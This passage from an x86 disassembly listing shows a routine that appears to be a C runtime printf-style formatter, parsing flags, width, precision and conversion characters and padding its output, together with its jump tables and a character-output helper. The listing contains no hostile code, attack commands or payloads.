ja short loc_41EC96
mov ecx, [ebp+var_298]
xor eax, eax
mov al, ds:byte_41F6EC[ecx]
jmp ds:off_41F6D4[eax*4]
loc_41EC63: ; CODE XREF: sub_41EA90+B9�j
; DATA XREF: .text:0041F6E0�o
mov edx, [ebp+var_4]
or edx, 4
mov [ebp+var_4], edx
jmp short loc_41EC96
; ---------------------------------------------------------------------------
loc_41EC6E: ; CODE XREF: sub_41EA90+B9�j
; sub_41EA90+1CC�j
; DATA XREF: ...
mov eax, [ebp+var_4]
or al, 1
mov [ebp+var_4], eax
jmp short loc_41EC96
; ---------------------------------------------------------------------------
loc_41EC78: ; CODE XREF: sub_41EA90+B9�j
; sub_41EA90+1CC�j
; DATA XREF: ...
mov ecx, [ebp+var_4]
or ecx, 2
mov [ebp+var_4], ecx
jmp short loc_41EC96
; ---------------------------------------------------------------------------
loc_41EC83: ; CODE XREF: sub_41EA90+B9�j
; sub_41EA90+1CC�j
; DATA XREF: ...
mov edx, [ebp+var_4]
or dl, 80h
mov [ebp+var_4], edx
jmp short loc_41EC96
; ---------------------------------------------------------------------------
loc_41EC8E: ; CODE XREF: sub_41EA90+B9�j
; sub_41EA90+1CC�j
; DATA XREF: ...
mov eax, [ebp+var_4]
or al, 8
mov [ebp+var_4], eax
loc_41EC96: ; CODE XREF: sub_41EA90+B9�j
; sub_41EA90+1BC�j ...
jmp loc_41F6A2
; ---------------------------------------------------------------------------
loc_41EC9B: ; CODE XREF: sub_41EA90+B9�j
; DATA XREF: .text:0041F6C0�o
movsx ecx, byte ptr [ebp+var_28]
cmp ecx, 2Ah
jnz short loc_41ECD7
lea edx, [ebp+arg_8]
push edx
call sub_41F8D0
add esp, 4
mov [ebp+var_244], eax
cmp [ebp+var_244], 0
jge short loc_41ECD5
mov eax, [ebp+var_4]
or al, 4
mov [ebp+var_4], eax
mov ecx, [ebp+var_244]
neg ecx
mov [ebp+var_244], ecx
loc_41ECD5: ; CODE XREF: sub_41EA90+22D�j
jmp short loc_41ECEE
; ---------------------------------------------------------------------------
loc_41ECD7: ; CODE XREF: sub_41EA90+212�j
mov edx, [ebp+var_244]
imul edx, 0Ah
movsx eax, byte ptr [ebp+var_28]
lea ecx, [edx+eax-30h]
mov [ebp+var_244], ecx
loc_41ECEE: ; CODE XREF: sub_41EA90:loc_41ECD5�j
jmp loc_41F6A2
; ---------------------------------------------------------------------------
loc_41ECF3: ; CODE XREF: sub_41EA90+B9�j
; DATA XREF: .text:0041F6C4�o
mov [ebp+var_234], 0
jmp loc_41F6A2
; ---------------------------------------------------------------------------
loc_41ED02: ; CODE XREF: sub_41EA90+B9�j
; DATA XREF: .text:0041F6C8�o
movsx edx, byte ptr [ebp+var_28]
cmp edx, 2Ah
jnz short loc_41ED32
lea eax, [ebp+arg_8]
push eax
call sub_41F8D0
add esp, 4
mov [ebp+var_234], eax
cmp [ebp+var_234], 0
jge short loc_41ED30
mov [ebp+var_234], 0FFFFFFFFh
loc_41ED30: ; CODE XREF: sub_41EA90+294�j
jmp short loc_41ED49
; ---------------------------------------------------------------------------
loc_41ED32: ; CODE XREF: sub_41EA90+279�j
mov ecx, [ebp+var_234]
imul ecx, 0Ah
movsx edx, byte ptr [ebp+var_28]
lea eax, [ecx+edx-30h]
mov [ebp+var_234], eax
loc_41ED49: ; CODE XREF: sub_41EA90:loc_41ED30�j
jmp loc_41F6A2
; ---------------------------------------------------------------------------
loc_41ED4E: ; CODE XREF: sub_41EA90+B9�j
; DATA XREF: .text:0041F6CC�o
movsx ecx, byte ptr [ebp+var_28]
mov [ebp+var_29C], ecx
mov edx, [ebp+var_29C]
sub edx, 49h
mov [ebp+var_29C], edx
cmp [ebp+var_29C], 2Eh
ja short loc_41EDDC
mov ecx, [ebp+var_29C]
xor eax, eax
mov al, ds:byte_41F711[ecx]
jmp ds:off_41F6FD[eax*4]
loc_41ED85: ; DATA XREF: .text:0041F705�o
mov edx, [ebp+var_4]
or edx, 10h
mov [ebp+var_4], edx
jmp short loc_41EDDC
; ---------------------------------------------------------------------------
loc_41ED90: ; CODE XREF: sub_41EA90+2EE�j
; DATA XREF: .text:off_41F6FD�o
mov eax, [ebp+arg_4]
movsx ecx, byte ptr [eax]
cmp ecx, 36h
jnz short loc_41EDBB
mov edx, [ebp+arg_4]
movsx eax, byte ptr [edx+1]
cmp eax, 34h
jnz short loc_41EDBB
mov ecx, [ebp+arg_4]
add ecx, 2
mov [ebp+arg_4], ecx
mov edx, [ebp+var_4]
or dh, 80h
mov [ebp+var_4], edx
jmp short loc_41EDC7
; ---------------------------------------------------------------------------
loc_41EDBB: ; CODE XREF: sub_41EA90+309�j
; sub_41EA90+315�j
mov [ebp+var_18], 0
jmp loc_41EB50
; ---------------------------------------------------------------------------
loc_41EDC7: ; CODE XREF: sub_41EA90+329�j
jmp short loc_41EDDC
; ---------------------------------------------------------------------------
loc_41EDC9: ; CODE XREF: sub_41EA90+2EE�j
; DATA XREF: .text:0041F701�o
mov eax, [ebp+var_4]
or al, 20h
mov [ebp+var_4], eax
jmp short loc_41EDDC
; ---------------------------------------------------------------------------
loc_41EDD3: ; CODE XREF: sub_41EA90+2EE�j
; DATA XREF: .text:0041F709�o
mov ecx, [ebp+var_4]
or ch, 8
mov [ebp+var_4], ecx
loc_41EDDC: ; CODE XREF: sub_41EA90+2DE�j
; sub_41EA90+2EE�j ...
jmp loc_41F6A2
; ---------------------------------------------------------------------------
loc_41EDE1: ; CODE XREF: sub_41EA90+B9�j
; DATA XREF: .text:0041F6D0�o
movsx edx, byte ptr [ebp+var_28]
mov [ebp+var_2A0], edx
mov eax, [ebp+var_2A0]
sub eax, 43h
mov [ebp+var_2A0], eax
cmp [ebp+var_2A0], 35h
ja loc_41F4C7
mov edx, [ebp+var_2A0]
xor ecx, ecx
mov cl, ds:byte_41F77C[edx]
jmp ds:off_41F740[ecx*4]
loc_41EE1C: ; DATA XREF: .text:off_41F740�o
mov eax, [ebp+var_4]
and eax, 830h
test eax, eax
jnz short loc_41EE31
mov ecx, [ebp+var_4]
or ch, 8
mov [ebp+var_4], ecx
loc_41EE31: ; CODE XREF: sub_41EA90+385�j
; sub_41EA90+396�j
; DATA XREF: ...
mov edx, [ebp+var_4]
and edx, 810h
test edx, edx
jz short loc_41EE77
lea eax, [ebp+arg_8]
push eax
call sub_41F910
add esp, 4
mov [ebp+var_14], ax
mov cx, [ebp+var_14]
push ecx
lea edx, [ebp+var_228]
push edx
call sub_427210
add esp, 8
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jge short loc_41EE75
mov [ebp+var_23C], 1
loc_41EE75: ; CODE XREF: sub_41EA90+3D9�j
jmp short loc_41EE9D
; ---------------------------------------------------------------------------
loc_41EE77: ; CODE XREF: sub_41EA90+3AC�j
lea eax, [ebp+arg_8]
push eax
call sub_41F8D0
add esp, 4
mov [ebp+var_248], ax
mov cl, byte ptr [ebp+var_248]
mov [ebp+var_228], cl
mov [ebp+var_24], 1
loc_41EE9D: ; CODE XREF: sub_41EA90:loc_41EE75�j
lea edx, [ebp+var_228]
mov [ebp+var_20], edx
jmp loc_41F4C7
; ---------------------------------------------------------------------------
loc_41EEAB: ; CODE XREF: sub_41EA90+385�j
; DATA XREF: .text:0041F750�o
lea eax, [ebp+arg_8]
push eax
call sub_41F8D0
add esp, 4
mov [ebp+var_24C], eax
cmp [ebp+var_24C], 0
jz short loc_41EED2
mov ecx, [ebp+var_24C]
cmp dword ptr [ecx+4], 0
jnz short loc_41EEEC
loc_41EED2: ; CODE XREF: sub_41EA90+434�j
mov edx, off_442F64
mov [ebp+var_20], edx
mov eax, [ebp+var_20]
push eax
call sub_418E70
add esp, 4
mov [ebp+var_24], eax
jmp short loc_41EF3B
; ---------------------------------------------------------------------------
loc_41EEEC: ; CODE XREF: sub_41EA90+440�j
mov ecx, [ebp+var_4]
and ecx, 800h
test ecx, ecx
jz short loc_41EF1C
mov edx, [ebp+var_24C]
mov eax, [edx+4]
mov [ebp+var_20], eax
mov ecx, [ebp+var_24C]
movsx edx, word ptr [ecx]
shr edx, 1
mov [ebp+var_24], edx
mov [ebp+var_1C], 1
jmp short loc_41EF3B
; ---------------------------------------------------------------------------
loc_41EF1C: ; CODE XREF: sub_41EA90+467�j
mov [ebp+var_1C], 0
mov eax, [ebp+var_24C]
mov ecx, [eax+4]
mov [ebp+var_20], ecx
mov edx, [ebp+var_24C]
movsx eax, word ptr [edx]
mov [ebp+var_24], eax
loc_41EF3B: ; CODE XREF: sub_41EA90+45A�j
; sub_41EA90+48A�j
jmp loc_41F4C7
; ---------------------------------------------------------------------------
loc_41EF40: ; CODE XREF: sub_41EA90+385�j
; DATA XREF: .text:0041F748�o
mov ecx, [ebp+var_4]
and ecx, 830h
test ecx, ecx
jnz short loc_41EF56
mov edx, [ebp+var_4]
or dh, 8
mov [ebp+var_4], edx
loc_41EF56: ; CODE XREF: sub_41EA90+385�j
; sub_41EA90+4BB�j
; DATA XREF: ...
cmp [ebp+var_234], 0FFFFFFFFh
jnz short loc_41EF6B
mov [ebp+var_2A4], 7FFFFFFFh
jmp short loc_41EF77
; ---------------------------------------------------------------------------
loc_41EF6B: ; CODE XREF: sub_41EA90+4CD�j
mov eax, [ebp+var_234]
mov [ebp+var_2A4], eax
loc_41EF77: ; CODE XREF: sub_41EA90+4D9�j
mov ecx, [ebp+var_2A4]
mov [ebp+var_258], ecx
lea edx, [ebp+arg_8]
push edx
call sub_41F8D0
add esp, 4
mov [ebp+var_20], eax
mov eax, [ebp+var_4]
and eax, 810h
test eax, eax
jz short loc_41F006
cmp [ebp+var_20], 0
jnz short loc_41EFAD
mov ecx, off_442F68
mov [ebp+var_20], ecx
loc_41EFAD: ; CODE XREF: sub_41EA90+512�j
mov [ebp+var_1C], 1
mov edx, [ebp+var_20]
mov [ebp+var_254], edx
loc_41EFBD: ; CODE XREF: sub_41EA90+564�j
mov eax, [ebp+var_258]
mov ecx, [ebp+var_258]
sub ecx, 1
mov [ebp+var_258], ecx
test eax, eax
jz short loc_41EFF6
mov edx, [ebp+var_254]
xor eax, eax
mov ax, [edx]
test eax, eax
jz short loc_41EFF6
mov ecx, [ebp+var_254]
add ecx, 2
mov [ebp+var_254], ecx
jmp short loc_41EFBD
; ---------------------------------------------------------------------------
loc_41EFF6: ; CODE XREF: sub_41EA90+544�j
; sub_41EA90+553�j
mov edx, [ebp+var_254]
sub edx, [ebp+var_20]
sar edx, 1
mov [ebp+var_24], edx
jmp short loc_41F060
; ---------------------------------------------------------------------------
loc_41F006: ; CODE XREF: sub_41EA90+50C�j
cmp [ebp+var_20], 0
jnz short loc_41F014
mov eax, off_442F64
mov [ebp+var_20], eax
loc_41F014: ; CODE XREF: sub_41EA90+57A�j
mov ecx, [ebp+var_20]
mov [ebp+var_250], ecx
loc_41F01D: ; CODE XREF: sub_41EA90+5C2�j
mov edx, [ebp+var_258]
mov eax, [ebp+var_258]
sub eax, 1
mov [ebp+var_258], eax
test edx, edx
jz short loc_41F054
mov ecx, [ebp+var_250]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_41F054
mov eax, [ebp+var_250]
add eax, 1
mov [ebp+var_250], eax
jmp short loc_41F01D
; ---------------------------------------------------------------------------
loc_41F054: ; CODE XREF: sub_41EA90+5A4�j
; sub_41EA90+5B1�j
mov ecx, [ebp+var_250]
sub ecx, [ebp+var_20]
mov [ebp+var_24], ecx
loc_41F060: ; CODE XREF: sub_41EA90+574�j
jmp loc_41F4C7
; ---------------------------------------------------------------------------
loc_41F065: ; CODE XREF: sub_41EA90+385�j
; DATA XREF: .text:0041F760�o
lea edx, [ebp+arg_8]
push edx
call sub_41F8D0
add esp, 4
mov [ebp+var_25C], eax
mov eax, [ebp+var_4]
and eax, 20h
test eax, eax
jz short loc_41F093
mov ecx, [ebp+var_25C]
mov dx, word ptr [ebp+var_22C]
mov [ecx], dx
jmp short loc_41F0A1
; ---------------------------------------------------------------------------
loc_41F093: ; CODE XREF: sub_41EA90+5EF�j
mov eax, [ebp+var_25C]
mov ecx, [ebp+var_22C]
mov [eax], ecx
loc_41F0A1: ; CODE XREF: sub_41EA90+601�j
mov [ebp+var_23C], 1
jmp loc_41F4C7
; ---------------------------------------------------------------------------
loc_41F0B0: ; CODE XREF: sub_41EA90+385�j
; DATA XREF: .text:0041F744�o
mov [ebp+var_8], 1
mov dl, byte ptr [ebp+var_28]
add dl, 20h
mov byte ptr [ebp+var_28], dl
loc_41F0C0: ; CODE XREF: sub_41EA90+385�j
; DATA XREF: .text:0041F75C�o
mov eax, [ebp+var_4]
or al, 40h
mov [ebp+var_4], eax
lea ecx, [ebp+var_228]
mov [ebp+var_20], ecx
cmp [ebp+var_234], 0
jge short loc_41F0E6
mov [ebp+var_234], 6
jmp short loc_41F102
; ---------------------------------------------------------------------------
loc_41F0E6: ; CODE XREF: sub_41EA90+648�j
cmp [ebp+var_234], 0
jnz short loc_41F102
movsx edx, byte ptr [ebp+var_28]
cmp edx, 67h
jnz short loc_41F102
mov [ebp+var_234], 1
loc_41F102: ; CODE XREF: sub_41EA90+654�j
; sub_41EA90+65D�j ...
mov eax, [ebp+arg_8]
add eax, 8
mov [ebp+arg_8], eax
mov ecx, [ebp+arg_8]
sub ecx, 8
mov edx, [ecx]
mov eax, [ecx+4]
mov [ebp+var_264], edx
mov [ebp+var_260], eax
mov ecx, [ebp+var_8]
push ecx
mov edx, [ebp+var_234]
push edx
movsx eax, byte ptr [ebp+var_28]
push eax
mov ecx, [ebp+var_20]
push ecx
lea edx, [ebp+var_264]
push edx
call off_443200
add esp, 14h
mov eax, [ebp+var_4]
and eax, 80h
test eax, eax
jz short loc_41F168
cmp [ebp+var_234], 0
jnz short loc_41F168
mov ecx, [ebp+var_20]
push ecx
call off_44320C
add esp, 4
loc_41F168: ; CODE XREF: sub_41EA90+6C0�j
; sub_41EA90+6C9�j
movsx edx, byte ptr [ebp+var_28]
cmp edx, 67h
jnz short loc_41F18A
mov eax, [ebp+var_4]
and eax, 80h
test eax, eax
jnz short loc_41F18A
mov ecx, [ebp+var_20]
push ecx
call off_443204
add esp, 4
loc_41F18A: ; CODE XREF: sub_41EA90+6DF�j
; sub_41EA90+6EB�j
mov edx, [ebp+var_20]
movsx eax, byte ptr [edx]
cmp eax, 2Dh
jnz short loc_41F1A7
mov ecx, [ebp+var_4]
or ch, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_20]
add edx, 1
mov [ebp+var_20], edx
loc_41F1A7: ; CODE XREF: sub_41EA90+703�j
mov eax, [ebp+var_20]
push eax
call sub_418E70
add esp, 4
mov [ebp+var_24], eax
jmp loc_41F4C7
; ---------------------------------------------------------------------------
loc_41F1BB: ; CODE XREF: sub_41EA90+385�j
; DATA XREF: .text:0041F758�o
mov ecx, [ebp+var_4]
or ecx, 40h
mov [ebp+var_4], ecx
mov [ebp+var_238], 0Ah
jmp loc_41F255
; ---------------------------------------------------------------------------
loc_41F1D3: ; CODE XREF: sub_41EA90+385�j
; DATA XREF: .text:0041F770�o
mov [ebp+var_238], 0Ah
jmp short loc_41F255
; ---------------------------------------------------------------------------
loc_41F1DF: ; CODE XREF: sub_41EA90+385�j
; DATA XREF: .text:0041F768�o
mov [ebp+var_234], 8
loc_41F1E9: ; CODE XREF: sub_41EA90+385�j
; DATA XREF: .text:0041F74C�o
mov [ebp+var_230], 7
jmp short loc_41F1FF
; ---------------------------------------------------------------------------
loc_41F1F5: ; CODE XREF: sub_41EA90+385�j
; DATA XREF: .text:0041F774�o
mov [ebp+var_230], 27h
loc_41F1FF: ; CODE XREF: sub_41EA90+763�j
mov [ebp+var_238], 10h
mov edx, [ebp+var_4]
and edx, 80h
test edx, edx
jz short loc_41F233
mov [ebp+var_240], 30h
mov eax, [ebp+var_230]
add eax, 51h
mov [ebp+var_23F], al
mov [ebp+var_10], 2
loc_41F233: ; CODE XREF: sub_41EA90+784�j
jmp short loc_41F255
; ---------------------------------------------------------------------------
loc_41F235: ; CODE XREF: sub_41EA90+385�j
; DATA XREF: .text:0041F764�o
mov [ebp+var_238], 8
mov ecx, [ebp+var_4]
and ecx, 80h
test ecx, ecx
jz short loc_41F255
mov edx, [ebp+var_4]
or dh, 2
mov [ebp+var_4], edx
loc_41F255: ; CODE XREF: sub_41EA90+73E�j
; sub_41EA90+74D�j ...
mov eax, [ebp+var_4]
and eax, 8000h
test eax, eax
jz short loc_41F27E
lea ecx, [ebp+arg_8]
push ecx
call sub_41F8F0
add esp, 4
mov [ebp+var_278], eax
mov [ebp+var_274], edx
jmp loc_41F30F
; ---------------------------------------------------------------------------
loc_41F27E: ; CODE XREF: sub_41EA90+7CF�j
mov edx, [ebp+var_4]
and edx, 20h
test edx, edx
jz short loc_41F2D0
mov eax, [ebp+var_4]
and eax, 40h
test eax, eax
jz short loc_41F2B0
lea ecx, [ebp+arg_8]
push ecx
call sub_41F8D0
add esp, 4
movsx eax, ax
cdq
mov [ebp+var_278], eax
mov [ebp+var_274], edx
jmp short loc_41F2CE
; ---------------------------------------------------------------------------
loc_41F2B0: ; CODE XREF: sub_41EA90+800�j
lea edx, [ebp+arg_8]
push edx
call sub_41F8D0
add esp, 4
and eax, 0FFFFh
cdq
mov [ebp+var_278], eax
mov [ebp+var_274], edx
loc_41F2CE: ; CODE XREF: sub_41EA90+81E�j
jmp short loc_41F30F
; ---------------------------------------------------------------------------
loc_41F2D0: ; CODE XREF: sub_41EA90+7F6�j
mov eax, [ebp+var_4]
and eax, 40h
test eax, eax
jz short loc_41F2F5
lea ecx, [ebp+arg_8]
push ecx
call sub_41F8D0
add esp, 4
cdq
mov [ebp+var_278], eax
mov [ebp+var_274], edx
jmp short loc_41F30F
; ---------------------------------------------------------------------------
loc_41F2F5: ; CODE XREF: sub_41EA90+848�j
lea edx, [ebp+arg_8]
push edx
call sub_41F8D0
add esp, 4
xor ecx, ecx
mov [ebp+var_278], eax
mov [ebp+var_274], ecx
loc_41F30F: ; CODE XREF: sub_41EA90+7E9�j
; sub_41EA90:loc_41F2CE�j ...
mov edx, [ebp+var_4]
and edx, 40h
test edx, edx
jz short loc_41F357
cmp [ebp+var_274], 0
jg short loc_41F357
jl short loc_41F32D
cmp [ebp+var_278], 0
jnb short loc_41F357
loc_41F32D: ; CODE XREF: sub_41EA90+892�j
mov eax, [ebp+var_278]
neg eax
mov ecx, [ebp+var_274]
adc ecx, 0
neg ecx
mov [ebp+var_26C], eax
mov [ebp+var_268], ecx
mov edx, [ebp+var_4]
or dh, 1
mov [ebp+var_4], edx
jmp short loc_41F36F
; ---------------------------------------------------------------------------
loc_41F357: ; CODE XREF: sub_41EA90+887�j
; sub_41EA90+890�j ...
mov eax, [ebp+var_278]
mov [ebp+var_26C], eax
mov ecx, [ebp+var_274]
mov [ebp+var_268], ecx
loc_41F36F: ; CODE XREF: sub_41EA90+8C5�j
mov edx, [ebp+var_4]
and edx, 8000h
test edx, edx
jnz short loc_41F397
mov eax, [ebp+var_26C]
mov ecx, [ebp+var_268]
and ecx, 0
mov [ebp+var_26C], eax
mov [ebp+var_268], ecx
loc_41F397: ; CODE XREF: sub_41EA90+8EA�j
cmp [ebp+var_234], 0
jge short loc_41F3AC
mov [ebp+var_234], 1
jmp short loc_41F3B5
; ---------------------------------------------------------------------------
loc_41F3AC: ; CODE XREF: sub_41EA90+90E�j
mov edx, [ebp+var_4]
and edx, 0FFFFFFF7h
mov [ebp+var_4], edx
loc_41F3B5: ; CODE XREF: sub_41EA90+91A�j
mov eax, [ebp+var_26C]
or eax, [ebp+var_268]
test eax, eax
jnz short loc_41F3CC
mov [ebp+var_10], 0
loc_41F3CC: ; CODE XREF: sub_41EA90+933�j
lea ecx, [ebp+var_29]
mov [ebp+var_20], ecx
loc_41F3D2: ; CODE XREF: sub_41EA90+9EB�j
mov edx, [ebp+var_234]
mov eax, [ebp+var_234]
sub eax, 1
mov [ebp+var_234], eax
test edx, edx
jg short loc_41F3FF
mov ecx, [ebp+var_26C]
or ecx, [ebp+var_268]
test ecx, ecx
jz loc_41F480
loc_41F3FF: ; CODE XREF: sub_41EA90+959�j
mov eax, [ebp+var_238]
cdq
push edx
push eax
mov edx, [ebp+var_268]
push edx
mov eax, [ebp+var_26C]
push eax
call sub_41A4B0
add eax, 30h
mov [ebp+var_270], eax
mov eax, [ebp+var_238]
cdq
push edx
push eax
mov ecx, [ebp+var_268]
push ecx
mov edx, [ebp+var_26C]
push edx
call sub_41A440
mov [ebp+var_26C], eax
mov [ebp+var_268], edx
cmp [ebp+var_270], 39h
jle short loc_41F467
mov eax, [ebp+var_270]
add eax, [ebp+var_230]
mov [ebp+var_270], eax
loc_41F467: ; CODE XREF: sub_41EA90+9C3�j
mov ecx, [ebp+var_20]
mov dl, byte ptr [ebp+var_270]
mov [ecx], dl
mov eax, [ebp+var_20]
sub eax, 1
mov [ebp+var_20], eax
jmp loc_41F3D2
; ---------------------------------------------------------------------------
loc_41F480: ; CODE XREF: sub_41EA90+969�j
lea ecx, [ebp+var_29]
sub ecx, [ebp+var_20]
mov [ebp+var_24], ecx
mov edx, [ebp+var_20]
add edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+var_4]
and eax, 200h
test eax, eax
jz short loc_41F4C7
mov ecx, [ebp+var_20]
movsx edx, byte ptr [ecx]
cmp edx, 30h
jnz short loc_41F4AF
cmp [ebp+var_24], 0
jnz short loc_41F4C7
loc_41F4AF: ; CODE XREF: sub_41EA90+A17�j
mov eax, [ebp+var_20]
sub eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+var_20]
mov byte ptr [ecx], 30h
mov edx, [ebp+var_24]
add edx, 1
mov [ebp+var_24], edx
loc_41F4C7: ; CODE XREF: sub_41EA90+371�j
; sub_41EA90+385�j ...
cmp [ebp+var_23C], 0
jnz loc_41F6A2
mov eax, [ebp+var_4]
and eax, 40h
test eax, eax
jz short loc_41F52D
mov ecx, [ebp+var_4]
and ecx, 100h
test ecx, ecx
jz short loc_41F4FB
mov [ebp+var_240], 2Dh
mov [ebp+var_10], 1
jmp short loc_41F52D
; ---------------------------------------------------------------------------
loc_41F4FB: ; CODE XREF: sub_41EA90+A59�j
mov edx, [ebp+var_4]
and edx, 1
test edx, edx
jz short loc_41F515
mov [ebp+var_240], 2Bh
mov [ebp+var_10], 1
jmp short loc_41F52D
; ---------------------------------------------------------------------------
loc_41F515: ; CODE XREF: sub_41EA90+A73�j
mov eax, [ebp+var_4]
and eax, 2
test eax, eax
jz short loc_41F52D
mov [ebp+var_240], 20h
mov [ebp+var_10], 1
loc_41F52D: ; CODE XREF: sub_41EA90+A4C�j
; sub_41EA90+A69�j ...
mov ecx, [ebp+var_244]
sub ecx, [ebp+var_24]
sub ecx, [ebp+var_10]
mov [ebp+var_27C], ecx
mov edx, [ebp+var_4]
and edx, 0Ch
test edx, edx
jnz short loc_41F565
lea eax, [ebp+var_22C]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_27C]
push edx
push 20h
call sub_41F840
add esp, 10h
loc_41F565: ; CODE XREF: sub_41EA90+AB7�j
lea eax, [ebp+var_22C]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_10]
push edx
lea eax, [ebp+var_240]
push eax
call sub_41F880
add esp, 10h
mov ecx, [ebp+var_4]
and ecx, 8
test ecx, ecx
jz short loc_41F5B3
mov edx, [ebp+var_4]
and edx, 4
test edx, edx
jnz short loc_41F5B3
lea eax, [ebp+var_22C]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_27C]
push edx
push 30h
call sub_41F840
add esp, 10h
loc_41F5B3: ; CODE XREF: sub_41EA90+AFB�j
; sub_41EA90+B05�j
cmp [ebp+var_1C], 0
jz loc_41F661
cmp [ebp+var_24], 0
jle loc_41F661
mov eax, [ebp+var_20]
mov [ebp+var_280], eax
mov ecx, [ebp+var_24]
mov [ebp+var_284], ecx
loc_41F5D9: ; CODE XREF: sub_41EA90+BCA�j
mov edx, [ebp+var_284]
mov eax, [ebp+var_284]
sub eax, 1
mov [ebp+var_284], eax
test edx, edx
jz short loc_41F65F
mov ecx, [ebp+var_280]
mov dx, [ecx]
mov [ebp+var_2A6], dx
mov ax, [ebp+var_2A6]
push eax
lea ecx, [ebp+var_288]
push ecx
mov edx, [ebp+var_280]
add edx, 2
mov [ebp+var_280], edx
call sub_427210
add esp, 8
mov [ebp+var_28C], eax
cmp [ebp+var_28C], 0
jg short loc_41F639
jmp short loc_41F65F
; ---------------------------------------------------------------------------
loc_41F639: ; CODE XREF: sub_41EA90+BA5�j
lea eax, [ebp+var_22C]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_28C]
push edx
lea eax, [ebp+var_288]
push eax
call sub_41F880
add esp, 10h
jmp loc_41F5D9
; ---------------------------------------------------------------------------
loc_41F65F: ; CODE XREF: sub_41EA90+B60�j
; sub_41EA90+BA7�j
jmp short loc_41F67C
; ---------------------------------------------------------------------------
loc_41F661: ; CODE XREF: sub_41EA90+B27�j
; sub_41EA90+B31�j
lea ecx, [ebp+var_22C]
push ecx
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+var_24]
push eax
mov ecx, [ebp+var_20]
push ecx
call sub_41F880
add esp, 10h
loc_41F67C: ; CODE XREF: sub_41EA90:loc_41F65F�j
mov edx, [ebp+var_4]
and edx, 4
test edx, edx
jz short loc_41F6A2
lea eax, [ebp+var_22C]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_27C]
push edx
push 20h
call sub_41F840
add esp, 10h
loc_41F6A2: ; CODE XREF: sub_41EA90+AD�j
; sub_41EA90+155�j ...
jmp loc_41EAB4
; ---------------------------------------------------------------------------
loc_41F6A7: ; CODE XREF: sub_41EA90+3B�j
; sub_41EA90+48�j
mov eax, [ebp+var_22C]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41EA90 endp
; ---------------------------------------------------------------------------
off_41F6B4 dd offset loc_41EB50 ; DATA XREF: sub_41EA90+B9�r
dd offset loc_41EBEA
dd offset loc_41EC2C
dd offset loc_41EC9B
dd offset loc_41ECF3
dd offset loc_41ED02
dd offset loc_41ED4E
dd offset loc_41EDE1
off_41F6D4 dd offset loc_41EC78 ; DATA XREF: sub_41EA90+1CC�r
dd offset loc_41EC83
dd offset loc_41EC6E
dd offset loc_41EC63
dd offset loc_41EC8E
dd offset loc_41EC96
byte_41F6EC db 0 ; DATA XREF: sub_41EA90+1C6�r
db 2 dup(5), 1
dd 5050505h, 2050505h, 5050305h
db 4
off_41F6FD dd offset loc_41ED90 ; DATA XREF: sub_41EA90+2EE�r
dd offset loc_41EDC9
dd offset loc_41ED85
dd offset loc_41EDD3
dd offset loc_41EDDC
byte_41F711 db 0 ; DATA XREF: sub_41EA90+2E8�r
dw 404h
dd 7 dup(4040404h), 4040401h, 4040402h, 4040404h, 3040404h
off_41F740 dd offset loc_41EE1C ; DATA XREF: sub_41EA90+385�r
dd offset loc_41F0B0
dd offset loc_41EF40
dd offset loc_41F1E9
dd offset loc_41EEAB
dd offset loc_41EE31
dd offset loc_41F1BB
dd offset loc_41F0C0
dd offset loc_41F065
dd offset loc_41F235
dd offset loc_41F1DF
dd offset loc_41EF56
dd offset loc_41F1D3
dd offset loc_41F1F5
dd offset loc_41F4C7
byte_41F77C db 0 ; DATA XREF: sub_41EA90+37F�r
db 0Eh, 1, 0Eh
dd 0E0E0E01h, 2 dup(0E0E0E0Eh), 0E0E0E02h, 40E030Eh, 2 dup(0E0E0E0Eh)
dd 7070605h, 0E060E07h, 80E0E0Eh, 0E0E0A09h, 0E0C0E0Bh
dd 0CCCC0D0Eh, 3 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F7C0 proc near ; CODE XREF: sub_41EA90+F5�p
; sub_41EA90+14D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
mov ecx, [eax+4]
sub ecx, 1
mov edx, [ebp+arg_4]
mov [edx+4], ecx
mov eax, [ebp+arg_4]
cmp dword ptr [eax+4], 0
jl short loc_41F802
mov ecx, [ebp+arg_4]
mov edx, [ecx]
mov al, byte ptr [ebp+arg_0]
mov [edx], al
movsx ecx, byte ptr [ebp+arg_0]
and ecx, 0FFh
mov [ebp+var_4], ecx
mov edx, [ebp+arg_4]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+arg_4]
mov [ecx], eax
jmp short loc_41F815
; ---------------------------------------------------------------------------
loc_41F802: ; CODE XREF: sub_41F7C0+1A�j
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_41E810
add esp, 8
mov [ebp+var_4], eax
loc_41F815: ; CODE XREF: sub_41F7C0+40�j
cmp [ebp+var_4], 0FFFFFFFFh
jnz short loc_41F826
mov ecx, [ebp+arg_8]
mov dword ptr [ecx], 0FFFFFFFFh
jmp short loc_41F833
; ---------------------------------------------------------------------------
loc_41F826: ; CODE XREF: sub_41F7C0+59�j
mov edx, [ebp+arg_8]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+arg_8]
mov [ecx], eax
loc_41F833: ; CODE XREF: sub_41F7C0+64�j
mov esp, ebp
pop ebp
retn
sub_41F7C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F840 proc near ; CODE XREF: sub_41EA90+ACD�p
; sub_41EA90+B1B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
